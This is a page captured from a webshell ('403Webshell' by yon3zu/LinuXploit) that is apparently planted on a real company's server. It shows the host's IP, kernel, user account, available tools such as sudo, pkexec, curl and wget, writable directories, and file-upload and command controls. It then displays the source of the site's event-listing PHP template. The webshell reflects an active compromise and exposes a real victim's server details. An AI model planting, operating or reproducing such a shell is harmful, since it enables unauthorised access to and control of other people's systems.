403Webshell
Server IP : 68.178.202.69  /  Your IP : 216.73.216.43
Web Server : Apache
System : Linux 69.202.178.68.host.secureserver.net 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
User : ikioworld ( 1005)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/ikioworld/public_html/application/views/event/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/ikioworld/public_html/application/views/event/index.php
<section class="ikio_breadcumb">
    <div class="ikio_container">
        <div class="ikio_breadcumb_inner">
            <ul>
                <li><a href="<?php echo base_url();?>home" class="active__link hsize15 mp_regular">Home</a></li>
                <li><span></span></li>
                <li><a href="<?php echo base_url();?>/events" class="hsize15 mp_regular">Events</a></li>
            </ul>
        </div>
        <div class="ikio__breacumbtite mp"> Events </div>
        <div class="lines_inner_bread"></div>
    </div>
</section>

<section class="ikio_eventsInner">
    <div class="ikio_container">
        <div class="ikio_evenstInnerContent">
            <h1 class="hsize40 font_900 " >Brand Presence for Better Reach
</h1>
            <p class="hsize18">
                IKIO actively takes part in numerous lighting events year round, where we get the opportunity to interact with industry veterans, experts and new entrants in the market and exchange knowledge. Keep following this page for regular updates. You can also follow our LinkedIn page and stay up to date on all the latest events. 

            </p>
        </div>
    </div>
</section>

<section class="upcoming__events">
    <div class="ikio_container">
         <div class="upcomin_evetnsInner">
               <h2>Upcoming Events</h2>
         </div>
         
         
         <div class="upcoming__evtnsDynamic">
             <?php if(count($evented)>0){
         foreach($evented as $event){?>
              <div class="row">
                 <div class="col-md-3">
                      <div class="upcoming_evntsBg">
                          <img src="<?php echo base_url();?>uploads/event/<?php echo $event->image?>">
                      </div>
                 </div>
                 <div class="col-md-9">
                     <div class="upcomin_dynamiContent">
                         <span class="events_Date"></span>
                         <div class="evtns_name"><h4><?php echo $event->event_name;?></h4></div>
                         
                          <?php 
                             $date_start = $event->event_start;
                             $date_end = $event->event_end;
                             
                             $dateStart = date('j F, Y', strtotime($date_start) ) ;
                             $dateEnd = date('j F, Y', strtotime($date_end) ) ;
                             
                             ?>
                         
                         <div class="evnts_Location">
                             <h6>Location: <span class="location_name"><?php echo $event->event_location;?></span></h6>
                              <h5>Date: <span class="date_events"><?php echo date('l', strtotime($date_start));?> , <?php echo $dateStart; ?> till <?php echo date('l', strtotime($date_end));?> , <?php echo $dateEnd; ?> </span></h5>
                             <p><?php echo $event->event_long_description;?></p>
                         </div>
                     </div>
                 </div>
             </div>
             <?php }}
             else{?>
            No Upcoming Events.
            <?php  }?>
         </div>
        
          <div class="upcomin_evetnsInner">
               <h2>Past Events</h2>
         </div>
         
          <div class="upcoming__evtnsDynamic">
              <?php if(count($events)>0){
              foreach($events as $even){?>
              <div class="row">
                 <div class="col-md-3">
                      <div class="upcoming_evntsBg" >
                          <img src="<?php echo base_url();?>uploads/event/<?php echo $even->image?>">
                      </div>
                 </div>
                 <div class="col-md-9">
                     <div class="upcomin_dynamiContent">
                         <span class="events_Date"></span>
                         <div class="evtns_name"><h4><?php echo $even->event_name;?></h4></div>
                         <div class="evnts_Location">
                             <h6>Location: <span class="location_name"><?php echo $even->event_location;?></span></h6>
                             
                             <?php 
                             $start_date = $even->event_start;
                             $end_date = $even->event_end;
                             
                             $dateToStart = date('j F, Y', strtotime($start_date) ) ;
                             $dateToEnd = date('j F, Y', strtotime($end_date) ) ;
                             
                             ?>
                             
                             <h5>Date: <span class="date_events"><?php echo date('l', strtotime($start_date));?> , <?php echo $dateToStart; ?> till <?php echo date('l', strtotime($end_date));?> , <?php echo $dateToEnd; ?> </span></h5>
                             <p><?php echo $even->event_long_description;?></p>
                         </div>
                     </div>
                 </div>
             </div>
             <?php }} ?>
         </div>
         
          
    </div>
</section>

Youez - 2016 - github.com/yon3zu
LinuXploit